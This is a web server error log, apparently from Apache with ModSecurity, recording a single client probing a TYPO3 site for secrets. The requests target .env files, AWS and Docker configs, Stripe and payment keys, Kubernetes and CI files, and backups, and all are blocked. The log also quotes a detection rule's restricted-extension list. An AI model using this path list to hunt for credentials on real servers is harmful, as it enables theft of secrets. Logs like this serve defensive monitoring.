[Sat Mar 21 04:08:13.178466 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "ab4LnbVOPlV6sIlrZCpldAAAAAA"]
[Sat Mar 21 04:08:13.601479 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab4LnbVOPlV6sIlrZCpldQAAAAA"]
[Sat Mar 21 04:08:13.601636 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab4LnbVOPlV6sIlrZCpldQAAAAA"]
[Sat Mar 21 04:08:13.601800 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab4LnbVOPlV6sIlrZCpldQAAAAA"]
[Sat Mar 21 04:08:13.996716 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sat Mar 21 04:08:14.290703 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_error.log
[Sat Mar 21 04:08:17.283262 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Mar 21 04:08:17.578191 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Mar 21 04:08:18.225115 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sat Mar 21 04:08:18.520668 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Mar 21 04:08:18.819588 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Mar 21 04:08:21.614198 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "ab4LpXlADzSPjlHD9OepWAAAAAU"]
[Sat Mar 21 04:08:21.614385 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "ab4LpXlADzSPjlHD9OepWAAAAAU"]
[Sat Mar 21 04:08:21.614540 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "ab4LpXlADzSPjlHD9OepWAAAAAU"]
[Sat Mar 21 04:08:23.201347 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/errors.log
[Sat Mar 21 04:08:23.495655 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "ab4Lp3lADzSPjlHD9OepXgAAAAU"]
[Sat Mar 21 04:08:23.495899 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "ab4Lp3lADzSPjlHD9OepXgAAAAU"]
[Sat Mar 21 04:08:23.497314 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "ab4Lp3lADzSPjlHD9OepXgAAAAU"]
[Sat Mar 21 04:08:24.404443 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s-config.yml
[Sat Mar 21 04:08:24.698643 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes.yml
[Sat Mar 21 04:08:24.992809 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "ab4LqHlADzSPjlHD9OepYwAAAAU"]
[Sat Mar 21 04:08:24.992966 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "ab4LqHlADzSPjlHD9OepYwAAAAU"]
[Sat Mar 21 04:08:24.993128 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "ab4LqHlADzSPjlHD9OepYwAAAAU"]
[Sat Mar 21 04:08:25.286806 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml
[Sat Mar 21 04:08:25.580679 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yaml
[Sat Mar 21 04:08:27.409838 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secrets.yml
[Sat Mar 21 04:08:28.009183 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/s3.yml
[Sat Mar 21 04:08:28.303382 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "ab4LrHlADzSPjlHD9OepbgAAAAU"]
[Sat Mar 21 04:08:28.303564 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "ab4LrHlADzSPjlHD9OepbgAAAAU"]
[Sat Mar 21 04:08:28.303720 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "ab4LrHlADzSPjlHD9OepbgAAAAU"]
[Sat Mar 21 04:08:33.806822 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Mar 21 04:08:35.018890 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 21 04:08:39.956255 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "ab4Lt3lADzSPjlHD9OepkwAAAAU"]
[Sat Mar 21 04:08:39.956503 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "ab4Lt3lADzSPjlHD9OepkwAAAAU"]
[Sat Mar 21 04:08:39.956643 2026] [:error] [pid 2837215] [client 13.54.173.38:60684] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "ab4Lt3lADzSPjlHD9OepkwAAAAU"]
[Sat Mar 21 04:08:40.293700 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Mar 21 04:08:44.429514 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Mar 21 04:08:46.789565 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Mar 21 04:08:47.405965 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Mar 21 04:08:48.017268 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Mar 21 04:08:48.311149 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Mar 21 04:08:48.605336 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Mar 21 04:08:48.899390 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Mar 21 04:08:49.193411 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Sat Mar 21 04:08:49.487352 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Sat Mar 21 04:08:49.781277 2026] [authz_core:error] [pid 2837215] [client 13.54.173.38:60684] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.bitbucket
[Sat Mar 21 04:08:53.444453 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/keys/payment.key"] [unique_id "ab4LxUXtVMtOWpT4ceI0bgAAAAY"]
[Sat Mar 21 04:08:53.444696 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/keys/payment.key"] [unique_id "ab4LxUXtVMtOWpT4ceI0bgAAAAY"]
[Sat Mar 21 04:08:53.444848 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/keys/payment.key"] [unique_id "ab4LxUXtVMtOWpT4ceI0bgAAAAY"]
[Sat Mar 21 04:08:54.678272 2026] [authz_core:error] [pid 2837264] [client 13.54.173.38:38972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Mar 21 04:09:11.341430 2026] [authz_core:error] [pid 2837264] [client 13.54.173.38:38972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s
[Sat Mar 21 04:09:11.640551 2026] [authz_core:error] [pid 2837264] [client 13.54.173.38:38972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s
[Sat Mar 21 04:09:11.939564 2026] [authz_core:error] [pid 2837264] [client 13.54.173.38:38972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Sat Mar 21 04:09:15.360711 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/stripe.old"] [unique_id "ab4L20XtVMtOWpT4ceI0pAAAAAY"]
[Sat Mar 21 04:09:15.360962 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/stripe.old"] [unique_id "ab4L20XtVMtOWpT4ceI0pAAAAAY"]
[Sat Mar 21 04:09:15.361113 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/stripe.old"] [unique_id "ab4L20XtVMtOWpT4ceI0pAAAAAY"]
[Sat Mar 21 04:09:15.970621 2026] [authz_core:error] [pid 2837264] [client 13.54.173.38:38972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Sat Mar 21 04:09:16.269635 2026] [authz_core:error] [pid 2837264] [client 13.54.173.38:38972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.stripe.bak
[Sat Mar 21 04:09:16.568821 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config.stripe.old"] [unique_id "ab4L3EXtVMtOWpT4ceI0qAAAAAY"]
[Sat Mar 21 04:09:16.569039 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config.stripe.old"] [unique_id "ab4L3EXtVMtOWpT4ceI0qAAAAAY"]
[Sat Mar 21 04:09:16.569193 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config.stripe.old"] [unique_id "ab4L3EXtVMtOWpT4ceI0qAAAAAY"]
[Sat Mar 21 04:09:20.296913 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe.json.backup"] [unique_id 